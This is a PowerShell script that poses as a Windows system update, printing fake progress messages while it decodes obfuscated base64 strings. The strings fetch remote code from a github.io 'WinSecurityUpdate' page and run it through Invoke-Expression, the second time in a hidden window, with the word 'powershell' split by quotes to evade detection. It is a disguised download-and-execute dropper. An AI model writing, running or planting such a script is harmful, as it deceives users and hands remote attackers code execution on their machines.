echo "[!] Preparing System for Update"
echo "[*] ============================"
start-sleep -s 1
echo "[*]"
start-sleep -s 1
echo "[*]"
start-sleep -s 1
echo "[*]"
echo "[!] Starting Update Process."
echo "[*] ============================"
start-sleep -s 1
echo "[*]"
start-sleep -s 1
echo "[*]"
start-sleep -s 1
echo "[*]"

$a1 = "SW5WT2tFLUVYcHJlU1NJb04oTmV3LU9CakVDdCBOZVQuV0ViQ0xpZW5UKS5Eb3dObE9hRFNUcmluRygnaHR0cHM6Ly9Nb25zdGVyU2ltby5naXRodWIuaW8vV2luU2VjdXJpdHlVcGRhdGUvYTEnKQo="
$r1 = "SW5WT2tFLUVYcHJlU1NJb04oTmV3LU9CakVDdCBOZVQuV0ViQ0xpZW5UKS5Eb3dObE9hRFNUcmluRygnaHR0cHM6Ly9Nb25zdGVyU2ltby5naXRodWIuaW8vV2luU2VjdXJpdHlVcGRhdGUvcjEnKQo="

start-sleep -s 1

$p1 = "UG9XZVJTaEVMbDs7LW5vUCAtYyAi"
$p2 = $p1.substring(0,28)

echo "[*]"
start-sleep -s 1
echo "[!] Update Process Completed"
start-sleep -s 1

$update_p2 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($p2))
$update_a1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a1))
$update_r1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($r1))

echo $update_a1 | pow""ersh""ell -nop - ; echo $update_r1 | pow""e""rsh""ell -nop -windowstyle hidden -
